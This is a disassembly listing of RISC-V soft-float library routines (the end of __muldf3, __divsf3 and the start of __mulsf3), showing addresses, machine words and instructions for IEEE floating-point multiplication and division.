8000179c: 000d8513 mv a0,s11
800017a0: 408010ef jal ra,80002ba8 <__mulsi3>
800017a4: 00c12683 lw a3,12(sp)
800017a8: 010cd793 srli a5,s9,0x10
800017ac: 00d50533 add a0,a0,a3
800017b0: 00a78533 add a0,a5,a0
800017b4: 00d57663 bleu a3,a0,800017c0 <__muldf3+0x2c0>
800017b8: 01012703 lw a4,16(sp)
800017bc: 00eb0b33 add s6,s6,a4
800017c0: 01055693 srli a3,a0,0x10
800017c4: 01457533 and a0,a0,s4
800017c8: 014cfcb3 and s9,s9,s4
800017cc: 01051513 slli a0,a0,0x10
800017d0: 019507b3 add a5,a0,s9
800017d4: 01045c93 srli s9,s0,0x10
800017d8: 01447433 and s0,s0,s4
800017dc: 000d0593 mv a1,s10
800017e0: 00040513 mv a0,s0
800017e4: 00d12a23 sw a3,20(sp)
800017e8: 00f12623 sw a5,12(sp)
800017ec: 3bc010ef jal ra,80002ba8 <__mulsi3>
800017f0: 00a12823 sw a0,16(sp)
800017f4: 00040593 mv a1,s0
800017f8: 000c0513 mv a0,s8
800017fc: 3ac010ef jal ra,80002ba8 <__mulsi3>
80001800: 00050a13 mv s4,a0
80001804: 000c8593 mv a1,s9
80001808: 000c0513 mv a0,s8
8000180c: 39c010ef jal ra,80002ba8 <__mulsi3>
80001810: 00050c13 mv s8,a0
80001814: 000d0593 mv a1,s10
80001818: 000c8513 mv a0,s9
8000181c: 38c010ef jal ra,80002ba8 <__mulsi3>
80001820: 01012703 lw a4,16(sp)
80001824: 01450533 add a0,a0,s4
80001828: 01412683 lw a3,20(sp)
8000182c: 01075793 srli a5,a4,0x10
80001830: 00a78533 add a0,a5,a0
80001834: 01457663 bleu s4,a0,80001840 <__muldf3+0x340>
80001838: 000107b7 lui a5,0x10
8000183c: 00fc0c33 add s8,s8,a5
80001840: 00010637 lui a2,0x10
80001844: 01055793 srli a5,a0,0x10
80001848: 01878c33 add s8,a5,s8
8000184c: fff60793 addi a5,a2,-1 # ffff <_stack_size+0xfbff>
80001850: 00f57a33 and s4,a0,a5
80001854: 00f77733 and a4,a4,a5
80001858: 010a1a13 slli s4,s4,0x10
8000185c: 01095d13 srli s10,s2,0x10
80001860: 00ea0a33 add s4,s4,a4
80001864: 00f97933 and s2,s2,a5
80001868: 01468733 add a4,a3,s4
8000186c: 00090593 mv a1,s2
80001870: 00048513 mv a0,s1
80001874: 00e12823 sw a4,16(sp)
80001878: 00c12e23 sw a2,28(sp)
8000187c: 32c010ef jal ra,80002ba8 <__mulsi3>
80001880: 00048593 mv a1,s1
80001884: 00a12c23 sw a0,24(sp)
80001888: 000d0513 mv a0,s10
8000188c: 31c010ef jal ra,80002ba8 <__mulsi3>
80001890: 00a12a23 sw a0,20(sp)
80001894: 000d0593 mv a1,s10
80001898: 000d8513 mv a0,s11
8000189c: 30c010ef jal ra,80002ba8 <__mulsi3>
800018a0: 00050493 mv s1,a0
800018a4: 00090593 mv a1,s2
800018a8: 000d8513 mv a0,s11
800018ac: 2fc010ef jal ra,80002ba8 <__mulsi3>
800018b0: 01412683 lw a3,20(sp)
800018b4: 01812703 lw a4,24(sp)
800018b8: 00d50533 add a0,a0,a3
800018bc: 01075793 srli a5,a4,0x10
800018c0: 00a78533 add a0,a5,a0
800018c4: 00d57663 bleu a3,a0,800018d0 <__muldf3+0x3d0>
800018c8: 01c12603 lw a2,28(sp)
800018cc: 00c484b3 add s1,s1,a2
800018d0: 000106b7 lui a3,0x10
800018d4: fff68793 addi a5,a3,-1 # ffff <_stack_size+0xfbff>
800018d8: 01055d93 srli s11,a0,0x10
800018dc: 009d84b3 add s1,s11,s1
800018e0: 00f57db3 and s11,a0,a5
800018e4: 00f77733 and a4,a4,a5
800018e8: 00090593 mv a1,s2
800018ec: 00040513 mv a0,s0
800018f0: 010d9d93 slli s11,s11,0x10
800018f4: 00ed8db3 add s11,s11,a4
800018f8: 00d12c23 sw a3,24(sp)
800018fc: 2ac010ef jal ra,80002ba8 <__mulsi3>
80001900: 00040593 mv a1,s0
80001904: 00a12a23 sw a0,20(sp)
80001908: 000d0513 mv a0,s10
8000190c: 29c010ef jal ra,80002ba8 <__mulsi3>
80001910: 000d0593 mv a1,s10
80001914: 00050413 mv s0,a0
80001918: 000c8513 mv a0,s9
8000191c: 28c010ef jal ra,80002ba8 <__mulsi3>
80001920: 00050d13 mv s10,a0
80001924: 00090593 mv a1,s2
80001928: 000c8513 mv a0,s9
8000192c: 27c010ef jal ra,80002ba8 <__mulsi3>
80001930: 01412703 lw a4,20(sp)
80001934: 00850533 add a0,a0,s0
80001938: 01075793 srli a5,a4,0x10
8000193c: 00a78533 add a0,a5,a0
80001940: 00857663 bleu s0,a0,8000194c <__muldf3+0x44c>
80001944: 01812683 lw a3,24(sp)
80001948: 00dd0d33 add s10,s10,a3
8000194c: 01012783 lw a5,16(sp)
80001950: 000106b7 lui a3,0x10
80001954: fff68693 addi a3,a3,-1 # ffff <_stack_size+0xfbff>
80001958: 00fb0b33 add s6,s6,a5
8000195c: 00d577b3 and a5,a0,a3
80001960: 00d77733 and a4,a4,a3
80001964: 01079793 slli a5,a5,0x10
80001968: 00e787b3 add a5,a5,a4
8000196c: 014b3a33 sltu s4,s6,s4
80001970: 018787b3 add a5,a5,s8
80001974: 01478433 add s0,a5,s4
80001978: 01bb0b33 add s6,s6,s11
8000197c: 00940733 add a4,s0,s1
80001980: 01bb3db3 sltu s11,s6,s11
80001984: 01b706b3 add a3,a4,s11
80001988: 0187bc33 sltu s8,a5,s8
8000198c: 01443433 sltu s0,s0,s4
80001990: 01055793 srli a5,a0,0x10
80001994: 00973733 sltu a4,a4,s1
80001998: 008c6433 or s0,s8,s0
8000199c: 01b6bdb3 sltu s11,a3,s11
800019a0: 00f40433 add s0,s0,a5
800019a4: 01b76db3 or s11,a4,s11
800019a8: 01b40433 add s0,s0,s11
800019ac: 01a40433 add s0,s0,s10
800019b0: 0176d793 srli a5,a3,0x17
800019b4: 00941413 slli s0,s0,0x9
800019b8: 00f46433 or s0,s0,a5
800019bc: 00c12783 lw a5,12(sp)
800019c0: 009b1493 slli s1,s6,0x9
800019c4: 017b5b13 srli s6,s6,0x17
800019c8: 00f4e4b3 or s1,s1,a5
800019cc: 009034b3 snez s1,s1
800019d0: 00969793 slli a5,a3,0x9
800019d4: 0164e4b3 or s1,s1,s6
800019d8: 00f4e4b3 or s1,s1,a5
800019dc: 00741793 slli a5,s0,0x7
800019e0: 1207d263 bgez a5,80001b04 <__muldf3+0x604>
800019e4: 0014d793 srli a5,s1,0x1
800019e8: 0014f493 andi s1,s1,1
800019ec: 0097e4b3 or s1,a5,s1
800019f0: 01f41793 slli a5,s0,0x1f
800019f4: 00f4e4b3 or s1,s1,a5
800019f8: 00145413 srli s0,s0,0x1
800019fc: 3ffa8713 addi a4,s5,1023
80001a00: 10e05663 blez a4,80001b0c <__muldf3+0x60c>
80001a04: 0074f793 andi a5,s1,7
80001a08: 02078063 beqz a5,80001a28 <__muldf3+0x528>
80001a0c: 00f4f793 andi a5,s1,15
80001a10: 00400693 li a3,4
80001a14: 00d78a63 beq a5,a3,80001a28 <__muldf3+0x528>
80001a18: 00448793 addi a5,s1,4
80001a1c: 0097b4b3 sltu s1,a5,s1
80001a20: 00940433 add s0,s0,s1
80001a24: 00078493 mv s1,a5
80001a28: 00741793 slli a5,s0,0x7
80001a2c: 0007da63 bgez a5,80001a40 <__muldf3+0x540>
80001a30: ff0007b7 lui a5,0xff000
80001a34: fff78793 addi a5,a5,-1 # feffffff <_stack_start+0x7eff9b2f>
80001a38: 00f47433 and s0,s0,a5
80001a3c: 400a8713 addi a4,s5,1024
80001a40: 7fe00793 li a5,2046
80001a44: 18e7c663 blt a5,a4,80001bd0 <__muldf3+0x6d0>
80001a48: 0034da93 srli s5,s1,0x3
80001a4c: 01d41493 slli s1,s0,0x1d
80001a50: 0154e4b3 or s1,s1,s5
80001a54: 00345413 srli s0,s0,0x3
80001a58: 001007b7 lui a5,0x100
80001a5c: fff78793 addi a5,a5,-1 # fffff <_stack_size+0xffbff>
80001a60: 00f47433 and s0,s0,a5
80001a64: 7ff77793 andi a5,a4,2047
80001a68: 80100737 lui a4,0x80100
80001a6c: fff70713 addi a4,a4,-1 # 800fffff <_stack_start+0xf9b2f>
80001a70: 01479793 slli a5,a5,0x14
80001a74: 00e47433 and s0,s0,a4
80001a78: 01fb9b93 slli s7,s7,0x1f
80001a7c: 00f46433 or s0,s0,a5
80001a80: 017467b3 or a5,s0,s7
80001a84: 05c12083 lw ra,92(sp)
80001a88: 05812403 lw s0,88(sp)
80001a8c: 00048513 mv a0,s1
80001a90: 05012903 lw s2,80(sp)
80001a94: 05412483 lw s1,84(sp)
80001a98: 04c12983 lw s3,76(sp)
80001a9c: 04812a03 lw s4,72(sp)
80001aa0: 04412a83 lw s5,68(sp)
80001aa4: 04012b03 lw s6,64(sp)
80001aa8: 03c12b83 lw s7,60(sp)
80001aac: 03812c03 lw s8,56(sp)
80001ab0: 03412c83 lw s9,52(sp)
80001ab4: 03012d03 lw s10,48(sp)
80001ab8: 02c12d83 lw s11,44(sp)
80001abc: 00078593 mv a1,a5
80001ac0: 06010113 addi sp,sp,96
80001ac4: 00008067 ret
80001ac8: 000b0b93 mv s7,s6
80001acc: 00090413 mv s0,s2
80001ad0: 000d0493 mv s1,s10
80001ad4: 000c8793 mv a5,s9
80001ad8: 00200713 li a4,2
80001adc: 0ee78a63 beq a5,a4,80001bd0 <__muldf3+0x6d0>
80001ae0: 00300713 li a4,3
80001ae4: 0ce78c63 beq a5,a4,80001bbc <__muldf3+0x6bc>
80001ae8: 00100713 li a4,1
80001aec: f0e798e3 bne a5,a4,800019fc <__muldf3+0x4fc>
80001af0: 00000413 li s0,0
80001af4: 00000493 li s1,0
80001af8: 0880006f j 80001b80 <__muldf3+0x680>
80001afc: 000c0b93 mv s7,s8
80001b00: fd9ff06f j 80001ad8 <__muldf3+0x5d8>
80001b04: 00098a93 mv s5,s3
80001b08: ef5ff06f j 800019fc <__muldf3+0x4fc>
80001b0c: 00100693 li a3,1
80001b10: 40e686b3 sub a3,a3,a4
80001b14: 03800793 li a5,56
80001b18: fcd7cce3 blt a5,a3,80001af0 <__muldf3+0x5f0>
80001b1c: 01f00793 li a5,31
80001b20: 06d7c463 blt a5,a3,80001b88 <__muldf3+0x688>
80001b24: 41ea8a93 addi s5,s5,1054
80001b28: 015417b3 sll a5,s0,s5
80001b2c: 00d4d733 srl a4,s1,a3
80001b30: 015494b3 sll s1,s1,s5
80001b34: 00e7e7b3 or a5,a5,a4
80001b38: 009034b3 snez s1,s1
80001b3c: 0097e4b3 or s1,a5,s1
80001b40: 00d45433 srl s0,s0,a3
80001b44: 0074f793 andi a5,s1,7
80001b48: 02078063 beqz a5,80001b68 <__muldf3+0x668>
80001b4c: 00f4f793 andi a5,s1,15
80001b50: 00400713 li a4,4
80001b54: 00e78a63 beq a5,a4,80001b68 <__muldf3+0x668>
80001b58: 00448793 addi a5,s1,4
80001b5c: 0097b4b3 sltu s1,a5,s1
80001b60: 00940433 add s0,s0,s1
80001b64: 00078493 mv s1,a5
80001b68: 00841793 slli a5,s0,0x8
80001b6c: 0607ca63 bltz a5,80001be0 <__muldf3+0x6e0>
80001b70: 01d41793 slli a5,s0,0x1d
80001b74: 0034d493 srli s1,s1,0x3
80001b78: 0097e4b3 or s1,a5,s1
80001b7c: 00345413 srli s0,s0,0x3
80001b80: 00000713 li a4,0
80001b84: ed5ff06f j 80001a58 <__muldf3+0x558>
80001b88: fe100793 li a5,-31
80001b8c: 40e787b3 sub a5,a5,a4
80001b90: 02000613 li a2,32
80001b94: 00f457b3 srl a5,s0,a5
80001b98: 00000713 li a4,0
80001b9c: 00c68663 beq a3,a2,80001ba8 <__muldf3+0x6a8>
80001ba0: 43ea8a93 addi s5,s5,1086
80001ba4: 01541733 sll a4,s0,s5
80001ba8: 009764b3 or s1,a4,s1
80001bac: 009034b3 snez s1,s1
80001bb0: 0097e4b3 or s1,a5,s1
80001bb4: 00000413 li s0,0
80001bb8: f8dff06f j 80001b44 <__muldf3+0x644>
80001bbc: 00080437 lui s0,0x80
80001bc0: 00000493 li s1,0
80001bc4: 7ff00713 li a4,2047
80001bc8: 00000b93 li s7,0
80001bcc: e8dff06f j 80001a58 <__muldf3+0x558>
80001bd0: 00000413 li s0,0
80001bd4: 00000493 li s1,0
80001bd8: 7ff00713 li a4,2047
80001bdc: e7dff06f j 80001a58 <__muldf3+0x558>
80001be0: 00000413 li s0,0
80001be4: 00000493 li s1,0
80001be8: 00100713 li a4,1
80001bec: e6dff06f j 80001a58 <__muldf3+0x558>
80001bf0 <__divsf3>:
80001bf0: fd010113 addi sp,sp,-48
80001bf4: 02912223 sw s1,36(sp)
80001bf8: 01512a23 sw s5,20(sp)
80001bfc: 01755493 srli s1,a0,0x17
80001c00: 00800ab7 lui s5,0x800
80001c04: 03212023 sw s2,32(sp)
80001c08: 01612823 sw s6,16(sp)
80001c0c: fffa8a93 addi s5,s5,-1 # 7fffff <_stack_size+0x7ffbff>
80001c10: 02112623 sw ra,44(sp)
80001c14: 02812423 sw s0,40(sp)
80001c18: 01312e23 sw s3,28(sp)
80001c1c: 01412c23 sw s4,24(sp)
80001c20: 01712623 sw s7,12(sp)
80001c24: 01812423 sw s8,8(sp)
80001c28: 0ff4f493 andi s1,s1,255
80001c2c: 00058b13 mv s6,a1
80001c30: 00aafab3 and s5,s5,a0
80001c34: 01f55913 srli s2,a0,0x1f
80001c38: 08048863 beqz s1,80001cc8 <__divsf3+0xd8>
80001c3c: 0ff00793 li a5,255
80001c40: 0af48463 beq s1,a5,80001ce8 <__divsf3+0xf8>
80001c44: 003a9a93 slli s5,s5,0x3
80001c48: 040007b7 lui a5,0x4000
80001c4c: 00faeab3 or s5,s5,a5
80001c50: f8148493 addi s1,s1,-127
80001c54: 00000b93 li s7,0
80001c58: 017b5513 srli a0,s6,0x17
80001c5c: 00800437 lui s0,0x800
80001c60: fff40413 addi s0,s0,-1 # 7fffff <_stack_size+0x7ffbff>
80001c64: 0ff57513 andi a0,a0,255
80001c68: 01647433 and s0,s0,s6
80001c6c: 01fb5b13 srli s6,s6,0x1f
80001c70: 08050c63 beqz a0,80001d08 <__divsf3+0x118>
80001c74: 0ff00793 li a5,255
80001c78: 0af50863 beq a0,a5,80001d28 <__divsf3+0x138>
80001c7c: 00341413 slli s0,s0,0x3
80001c80: 040007b7 lui a5,0x4000
80001c84: 00f46433 or s0,s0,a5
80001c88: f8150513 addi a0,a0,-127
80001c8c: 00000793 li a5,0
80001c90: 002b9713 slli a4,s7,0x2
80001c94: 00f76733 or a4,a4,a5
80001c98: fff70713 addi a4,a4,-1
80001c9c: 00e00693 li a3,14
80001ca0: 016949b3 xor s3,s2,s6
80001ca4: 40a48a33 sub s4,s1,a0
80001ca8: 0ae6e063 bltu a3,a4,80001d48 <__divsf3+0x158>
80001cac: 00001697 auipc a3,0x1
80001cb0: 67868693 addi a3,a3,1656 # 80003324 <end+0x658>
80001cb4: 00271713 slli a4,a4,0x2
80001cb8: 00d70733 add a4,a4,a3
80001cbc: 00072703 lw a4,0(a4)
80001cc0: 00d70733 add a4,a4,a3
80001cc4: 00070067 jr a4
80001cc8: 020a8a63 beqz s5,80001cfc <__divsf3+0x10c>
80001ccc: 000a8513 mv a0,s5
80001cd0: 7b1000ef jal ra,80002c80 <__clzsi2>
80001cd4: ffb50793 addi a5,a0,-5
80001cd8: f8a00493 li s1,-118
80001cdc: 00fa9ab3 sll s5,s5,a5
80001ce0: 40a484b3 sub s1,s1,a0
80001ce4: f71ff06f j 80001c54 <__divsf3+0x64>
80001ce8: 0ff00493 li s1,255
80001cec: 00200b93 li s7,2
80001cf0: f60a84e3 beqz s5,80001c58 <__divsf3+0x68>
80001cf4: 00300b93 li s7,3
80001cf8: f61ff06f j 80001c58 <__divsf3+0x68>
80001cfc: 00000493 li s1,0
80001d00: 00100b93 li s7,1
80001d04: f55ff06f j 80001c58 <__divsf3+0x68>
80001d08: 02040a63 beqz s0,80001d3c <__divsf3+0x14c>
80001d0c: 00040513 mv a0,s0
80001d10: 771000ef jal ra,80002c80 <__clzsi2>
80001d14: ffb50793 addi a5,a0,-5
80001d18: 00f41433 sll s0,s0,a5
80001d1c: f8a00793 li a5,-118
80001d20: 40a78533 sub a0,a5,a0
80001d24: f69ff06f j 80001c8c <__divsf3+0x9c>
80001d28: 0ff00513 li a0,255
80001d2c: 00200793 li a5,2
80001d30: f60400e3 beqz s0,80001c90 <__divsf3+0xa0>
80001d34: 00300793 li a5,3
80001d38: f59ff06f j 80001c90 <__divsf3+0xa0>
80001d3c: 00000513 li a0,0
80001d40: 00100793 li a5,1
80001d44: f4dff06f j 80001c90 <__divsf3+0xa0>
80001d48: 00541b13 slli s6,s0,0x5
80001d4c: 128af663 bleu s0,s5,80001e78 <__divsf3+0x288>
80001d50: fffa0a13 addi s4,s4,-1
80001d54: 00000913 li s2,0
80001d58: 010b5b93 srli s7,s6,0x10
80001d5c: 00010437 lui s0,0x10
80001d60: 000b8593 mv a1,s7
80001d64: fff40413 addi s0,s0,-1 # ffff <_stack_size+0xfbff>
80001d68: 000a8513 mv a0,s5
80001d6c: 669000ef jal ra,80002bd4 <__udivsi3>
80001d70: 008b7433 and s0,s6,s0
80001d74: 00050593 mv a1,a0
80001d78: 00050c13 mv s8,a0
80001d7c: 00040513 mv a0,s0
80001d80: 629000ef jal ra,80002ba8 <__mulsi3>
80001d84: 00050493 mv s1,a0
80001d88: 000b8593 mv a1,s7
80001d8c: 000a8513 mv a0,s5
80001d90: 68d000ef jal ra,80002c1c <__umodsi3>
80001d94: 01095913 srli s2,s2,0x10
80001d98: 01051513 slli a0,a0,0x10
80001d9c: 00a96533 or a0,s2,a0
80001da0: 000c0913 mv s2,s8
80001da4: 00957e63 bleu s1,a0,80001dc0 <__divsf3+0x1d0>
80001da8: 01650533 add a0,a0,s6
80001dac: fffc0913 addi s2,s8,-1
80001db0: 01656863 bltu a0,s6,80001dc0 <__divsf3+0x1d0>
80001db4: 00957663 bleu s1,a0,80001dc0 <__divsf3+0x1d0>
80001db8: ffec0913 addi s2,s8,-2
80001dbc: 01650533 add a0,a0,s6
80001dc0: 409504b3 sub s1,a0,s1
80001dc4: 000b8593 mv a1,s7
80001dc8: 00048513 mv a0,s1
80001dcc: 609000ef jal ra,80002bd4 <__udivsi3>
80001dd0: 00050593 mv a1,a0
80001dd4: 00050c13 mv s8,a0
80001dd8: 00040513 mv a0,s0
80001ddc: 5cd000ef jal ra,80002ba8 <__mulsi3>
80001de0: 00050a93 mv s5,a0
80001de4: 000b8593 mv a1,s7
80001de8: 00048513 mv a0,s1
80001dec: 631000ef jal ra,80002c1c <__umodsi3>
80001df0: 01051513 slli a0,a0,0x10
80001df4: 000c0413 mv s0,s8
80001df8: 01557e63 bleu s5,a0,80001e14 <__divsf3+0x224>
80001dfc: 01650533 add a0,a0,s6
80001e00: fffc0413 addi s0,s8,-1
80001e04: 01656863 bltu a0,s6,80001e14 <__divsf3+0x224>
80001e08: 01557663 bleu s5,a0,80001e14 <__divsf3+0x224>
80001e0c: ffec0413 addi s0,s8,-2
80001e10: 01650533 add a0,a0,s6
80001e14: 01091913 slli s2,s2,0x10
80001e18: 41550533 sub a0,a0,s5
80001e1c: 00896933 or s2,s2,s0
80001e20: 00a03533 snez a0,a0
80001e24: 00a96433 or s0,s2,a0
80001e28: 07fa0713 addi a4,s4,127
80001e2c: 0ae05063 blez a4,80001ecc <__divsf3+0x2dc>
80001e30: 00747793 andi a5,s0,7
80001e34: 00078a63 beqz a5,80001e48 <__divsf3+0x258>
80001e38: 00f47793 andi a5,s0,15
80001e3c: 00400693 li a3,4
80001e40: 00d78463 beq a5,a3,80001e48 <__divsf3+0x258>
80001e44: 00440413 addi s0,s0,4
80001e48: 00441793 slli a5,s0,0x4
80001e4c: 0007da63 bgez a5,80001e60 <__divsf3+0x270>
80001e50: f80007b7 lui a5,0xf8000
80001e54: fff78793 addi a5,a5,-1 # f7ffffff <_stack_start+0x77ff9b2f>
80001e58: 00f47433 and s0,s0,a5
80001e5c: 080a0713 addi a4,s4,128
80001e60: 0fe00793 li a5,254
80001e64: 00345413 srli s0,s0,0x3
80001e68: 0ce7d263 ble a4,a5,80001f2c <__divsf3+0x33c>
80001e6c: 00000413 li s0,0
80001e70: 0ff00713 li a4,255
80001e74: 0b80006f j 80001f2c <__divsf3+0x33c>
80001e78: 01fa9913 slli s2,s5,0x1f
80001e7c: 001ada93 srli s5,s5,0x1
80001e80: ed9ff06f j 80001d58 <__divsf3+0x168>
80001e84: 00090993 mv s3,s2
80001e88: 000a8413 mv s0,s5
80001e8c: 000b8793 mv a5,s7
80001e90: 00200713 li a4,2
80001e94: fce78ce3 beq a5,a4,80001e6c <__divsf3+0x27c>
80001e98: 00300713 li a4,3
80001e9c: 08e78263 beq a5,a4,80001f20 <__divsf3+0x330>
80001ea0: 00100713 li a4,1
80001ea4: f8e792e3 bne a5,a4,80001e28 <__divsf3+0x238>
80001ea8: 00000413 li s0,0
80001eac: 00000713 li a4,0
80001eb0: 07c0006f j 80001f2c <__divsf3+0x33c>
80001eb4: 000b0993 mv s3,s6
80001eb8: fd9ff06f j 80001e90 <__divsf3+0x2a0>
80001ebc: 00400437 lui s0,0x400
80001ec0: 00000993 li s3,0
80001ec4: 00300793 li a5,3
80001ec8: fc9ff06f j 80001e90 <__divsf3+0x2a0>
80001ecc: 00100793 li a5,1
80001ed0: 40e787b3 sub a5,a5,a4
80001ed4: 01b00713 li a4,27
80001ed8: fcf748e3 blt a4,a5,80001ea8 <__divsf3+0x2b8>
80001edc: 09ea0513 addi a0,s4,158
80001ee0: 00f457b3 srl a5,s0,a5
80001ee4: 00a41433 sll s0,s0,a0
80001ee8: 00803433 snez s0,s0
80001eec: 0087e433 or s0,a5,s0
80001ef0: 00747793 andi a5,s0,7
80001ef4: 00078a63 beqz a5,80001f08 <__divsf3+0x318>
80001ef8: 00f47793 andi a5,s0,15
80001efc: 00400713 li a4,4
80001f00: 00e78463 beq a5,a4,80001f08 <__divsf3+0x318>
80001f04: 00440413 addi s0,s0,4 # 400004 <_stack_size+0x3ffc04>
80001f08: 00541793 slli a5,s0,0x5
80001f0c: 00345413 srli s0,s0,0x3
80001f10: f807dee3 bgez a5,80001eac <__divsf3+0x2bc>
80001f14: 00000413 li s0,0
80001f18: 00100713 li a4,1
80001f1c: 0100006f j 80001f2c <__divsf3+0x33c>
80001f20: 00400437 lui s0,0x400
80001f24: 0ff00713 li a4,255
80001f28: 00000993 li s3,0
80001f2c: 00800537 lui a0,0x800
80001f30: fff50513 addi a0,a0,-1 # 7fffff <_stack_size+0x7ffbff>
80001f34: 00a47433 and s0,s0,a0
80001f38: 80800537 lui a0,0x80800
80001f3c: fff50513 addi a0,a0,-1 # 807fffff <_stack_start+0x7f9b2f>
80001f40: 0ff77713 andi a4,a4,255
80001f44: 00a47433 and s0,s0,a0
80001f48: 01771713 slli a4,a4,0x17
80001f4c: 01f99513 slli a0,s3,0x1f
80001f50: 00e46433 or s0,s0,a4
80001f54: 00a46533 or a0,s0,a0
80001f58: 02c12083 lw ra,44(sp)
80001f5c: 02812403 lw s0,40(sp)
80001f60: 02412483 lw s1,36(sp)
80001f64: 02012903 lw s2,32(sp)
80001f68: 01c12983 lw s3,28(sp)
80001f6c: 01812a03 lw s4,24(sp)
80001f70: 01412a83 lw s5,20(sp)
80001f74: 01012b03 lw s6,16(sp)
80001f78: 00c12b83 lw s7,12(sp)
80001f7c: 00812c03 lw s8,8(sp)
80001f80: 03010113 addi sp,sp,48
80001f84: 00008067 ret
80001f88 <__mulsf3>:
80001f88: fd010113 addi sp,sp,-48
80001f8c: 02912223 sw s1,36(sp)
80001f90: 03212023 sw s2,32(sp)
80001f94: 008004b7 lui s1,0x800
80001f98: 01755913 srli s2,a0,0x17
80001f9c: 01312e23 sw s3,28(sp)
80001fa0: 01712623 sw s7,12(sp)
80001fa4: fff48493 addi s1,s1,-1 # 7fffff <_stack_size+0x7ffbff>
80001fa8: 02112623 sw ra,44(sp)
80001fac: 02812423 sw s0,40(sp)
80001fb0: 01412c23 sw s4,24(sp)
80001fb4: 01512a23 sw s5,20(sp)
80001fb8: 01612823 sw s6,16(sp)
80001fbc: 01812423 sw s8,8(sp)
80001fc0: 01912223 sw s9,4(sp)
80001fc4: 0ff97913 andi s2,s2,255
80001fc8: 00058b93 mv s7,a1
80001fcc: 00a4f4b3 and s1,s1,a0
80001fd0: 01f55993 srli s3,a0,0x1f
80001fd4: 08090a63 beqz s2,80002068 <__mulsf3+0xe0>
80001fd8: 0ff00793 li a5,255
80001fdc: 0af90663 beq s2,a5,80002088 <__mulsf3+0x100>
80001fe0: 00349493 slli s1,s1,0x3
80001fe4: 040007b7 lui a5,0x4000
80001fe8: 00f4e4b3 or s1,s1,a5
80001fec: f8190913 addi s2,s2,-127 # 7fff81 <_stack_size+0x7ffb81>
80001ff0: 00000b13 li s6,0
80001ff4: 017bd513 srli a0,s7,0x17
80001ff8: 00800437 lui s0,0x800
80001ffc: fff40413 addi s0,s0,-1 # 7fffff <_stack_size+0x7ffbff>
80002000: 0ff57513 andi a0,a0,255
80002004: 01747433 and s0,s0,s7
80002008: 01fbdb93 srli s7,s7,0x1f
8000200c: 08050e63 beqz a0,800020a8 <__mulsf3+0x120>
80002010: 0ff00793 li a5,255
80002014: 0af50a63 beq a0,a5,800020c8 <__mulsf3+0x140>
80002018: 00341413 slli s0,s0,0x3
8000201c: 040007b7 lui a5,0x4000
80002020: 00f46433 or s0,s0,a5
80002024: f8150513 addi a0,a0,-127
80002028: 00000693 li a3,0
8000202c: 002b1793 slli a5,s6,0x2
80002030: 00d7e7b3 or a5,a5,a3
80002034: 00a90933 add s2,s2,a0
80002038: fff78793 addi a5,a5,-1 # 3ffffff <_stack_size+0x3fffbff>
8000203c: 00e00713 li a4,14
80002040: 0179ca33 xor s4,s3,s7
80002044: 00190a93 addi s5,s2,1
80002048: 0af76063 bltu a4,a5,800020e8 <__mulsf3+0x160>
8000204c: 00001717 auipc a4,0x1
80002050: 31470713 addi a4,a4,788 # 80003360 <end+0x694>
80002054: 00279793 slli a5,a5,0x2
80002058: 00e787b3 add a5,a5,a4
8000205c: 0007a783 lw a5,0(a5)
80002060: 00e787b3 add a5,a5,a4
80002064: 00078067 jr a5
80002068: 02048a63 beqz s1,8000209c <__mulsf3+0x114>
8000206c: 00048513 mv a0,s1
80002070: 411000ef jal ra,80002c80 <__clzsi2>
80002074: ffb50793 addi a5,a0,-5
80002078: f8a00913 li s2,-118
8000207c: 00f494b3 sll s1,s1,a5
80002080: 40a90933 sub s2,s2,a0
80002084: f6dff06f j 80001ff0 <__mulsf3+0x68>
80002088: 0ff00913 li s2,255
8000208c: 00200b13 li s6,2
80002090: f60482e3 beqz s1,80001ff4 <__mulsf3+0x6c>
80002094: 00300b13 li s6,3
80002098: f5dff06f j 80001ff4 <__mulsf3+0x6c>
8000209c: 00000913 li s2,0
800020a0: 00100b13 li s6,1
800020a4: f51ff06f j 80001ff4 <__mulsf3+0x6c>
800020a8: 02040a63 beqz s0,800020dc <__mulsf3+0x154>
800020ac: 00040513 mv a0,s0
800020b0: 3d1000ef jal ra,80002c80 <__clzsi2>
800020b4: ffb50793 addi a5,a0,-5
800020b8: 00f41433 sll s0,s0,a5
800020bc: f8a00793 li a5,-118
800020c0: 40a78533 sub a0,a5,a0
800020c4: f65ff06f j 80002028 <__mulsf3+0xa0>
800020c8: 0ff00513 li a0,255
800020cc: 00200693 li a3,2
800020d0: f4040ee3 beqz s0,8000202c <__mulsf3+0xa4>
800020d4: 00300693 li a3,3
800020d8: f55ff06f j 8000202c <__mulsf3+0xa4>
800020dc: 00000513 li a0,0
800020e0: 00100693 li a3,1
800020e4: f49ff06f j 8000202c <__mulsf3+0xa4>
800020e8: 00010c37 lui s8,0x10
800020ec: fffc0b13 addi s6,s8,-1 # ffff <_stack_size+0xfbff>
800020f0: 0104db93 srli s7,s1,0x10
800020f4: 01045c93 srli s9,s0,0x10
800020f8: 0164f4b3 and s1,s1,s6
800020fc: 01647433 and s0,s0,s6
80002100: 00040593 mv a1,s0
80002104: 00048513 mv a0,s1
80002108: 2a1000ef jal ra,80002ba8 <__mulsi3>
8000210c: 00040593 mv a1,s0
80002110: 00050993 mv s3,a0
80002114: 000b8513 mv a0,s7
80002118: 291000ef jal ra,80002ba8 <__mulsi3>
8000211c: 00050413 mv s0,a0
80002120: 000c8593 mv a1,s9
80002124: 000b8513 mv a0,s7
80002128: 281000ef jal ra,80002ba8 <__mulsi3>
8000212c: 00050b93 mv s7,a0
80002130: 00048593 mv a1,s1
80002134: 000c8513 mv a0,s9
80002138: 271000ef jal ra,80002ba8 <__mulsi3>
8000213c: 00850533 add a0,a0,s0
80002140: 0109d793 srli a5,s3,0x10
80002144: 00a78533 add a0,a5,a0
80002148: 00857463 bleu s0,a0,80002150 <__mulsf3+0x1c8>
8000214c: 018b8bb3 add s7,s7,s8
80002150: 016577b3 and a5,a0,s6
80002154: 01079793 slli a5,a5,0x10
80002158: 0169f9b3 and s3,s3,s6
8000215c: 013787b3 add a5,a5,s3
80002160: 00679413 slli s0,a5,0x6
80002164: 00803433 snez s0,s0
80002168: 01a7d793 srli a5,a5,0x1a
8000216c: 01055513 srli a0,a0,0x10
80002170: 00f467b3 or a5,s0,a5
80002174: 01750433 add s0,a0,s7
80002178: 00641413 slli s0,s0,0x6
8000217c: 00f46433 or s0,s0,a5
80002180: 00441793 slli a5,s0,0x4
80002184: 0e07d663 bgez a5,80002270 <__mulsf3+0x2e8>
80002188: 00145793 srli a5,s0,0x1
